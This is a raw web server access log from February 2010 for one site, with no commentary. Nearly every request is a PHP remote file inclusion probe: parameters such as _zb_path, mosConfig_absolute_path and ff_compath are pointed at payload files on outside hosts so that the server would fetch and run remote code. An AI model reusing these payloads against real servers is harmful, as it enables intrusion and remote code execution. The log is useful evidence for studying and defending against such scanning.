222.122.197.10 - - [14/Feb/2010:08:00:43 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:00:46 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:00:49 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:01:01 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:01:06 -0800] "GET /logs/access_100122.log%20%20//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:01:06 -0800] "GET /logs//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:01:07 -0800] "GET /?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:01:30 -0800] "GET /logs/access_100114.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:01:59 -0800] "GET /logs/access_100201.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:08:02:13 -0800] "GET /logs/access_100202.log%20%20/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:02:18 -0800] "GET /logs/access_100122.log%20%20//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:02:18 -0800] "GET /logs//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:02:19 -0800] "GET /?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:02:21 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:02:21 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:02:21 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:02:31 -0800] "GET /logs/access_100112.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:08:02:33 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:08:02:33 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:08:02:33 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:02:42 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:02:42 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:02:42 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:08:03:06 -0800] "GET /logs/access_100109.log/phphtml.php?htmlclass_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:08:03:06 -0800] "GET /phphtml.php?htmlclass_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:08:03:06 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:08:03:09 -0800] "GET /logs/access_100124.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:03:16 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:03:33 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:03:33 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:03:33 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:03:37 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:03:37 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:03:37 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:03:42 -0800] "GET /logs/access_100124.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:03:43 -0800] "GET /logs/access_100114.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:03:44 -0800] "GET /logs/access_100105.log%20%20//atom.php5?page=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:03:44 -0800] "GET /logs//atom.php5?page=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:03:44 -0800] "GET /atom.php5?page=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:03:54 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:08:04:34 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:04:55 -0800] "GET /logs/access_100125.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:04:55 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:04:55 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:08:05:09 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:08:05:09 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:08:05:10 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:05:16 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:05:35 -0800] "GET /logs/access_100111.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:05:51 -0800] "GET /logs/access_100105.log//atom.php5?page=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:08:05:51 -0800] "GET /logs/access_100117.log//atom.php5?page=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:06:05 -0800] "GET /logs/access_100120.log%20%20//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:06:05 -0800] "GET /logs/access_100111.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:08:06:17 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [14/Feb/2010:08:06:18 -0800] "GET /logs/access_100120.log%20%20//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:08:06:18 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:08:06:18 -0800] "GET /phphtml.php?htmlclass_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:07:30 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:07:30 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:07:30 -0800] "GET /logs/access_100129.log%20%20/classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:07:37 -0800] "GET /logs/access_100201.log%20%20/surveys/survey.inc.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:07:37 -0800] "GET /surveys/survey.inc.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:07:37 -0800] "GET /logs/surveys/survey.inc.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:08:08:04 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:08:07 -0800] "GET /logs/access_100129.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:08:08:07 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:08:08:07 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:08:08:07 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:08:21 -0800] "GET /logs/access_100125.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:08:41 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:08:41 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:08:41 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:08:42 -0800] "GET /logs/access_100129.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:08:55 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:08:55 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:08:55 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:09:02 -0800] "GET /logs/access_100111.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:09:05 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:09:05 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:09:06 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:09:09 -0800] "GET /logs/access_100116.log%20%20/classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:09:10 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:09:14 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:09:14 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:09:14 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:09:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:09:18 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:09:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:09:19 -0800] "GET /logs/access_100109.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:09:19 -0800] "GET /logs/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:09:20 -0800] "GET /index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:08:09:20 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:09:31 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:09:31 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:09:31 -0800] "GET /logs/access_100129.log%20%20/classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:09:37 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:09:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:08:09:38 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:09:39 -0800] "GET /logs/access_100129.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
210.116.103.118 - - [14/Feb/2010:08:09:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [14/Feb/2010:08:09:41 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [14/Feb/2010:08:09:42 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:08:09:52 -0800] "GET /logs/access_100116.log%20%20/classes/adodbt/sql.php?classes_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:09:53 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:09:53 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:09:56 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:01 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:06 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:13 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:13 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:13 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:28 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.112.126.5 - - [14/Feb/2010:08:10:28 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:10:38 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
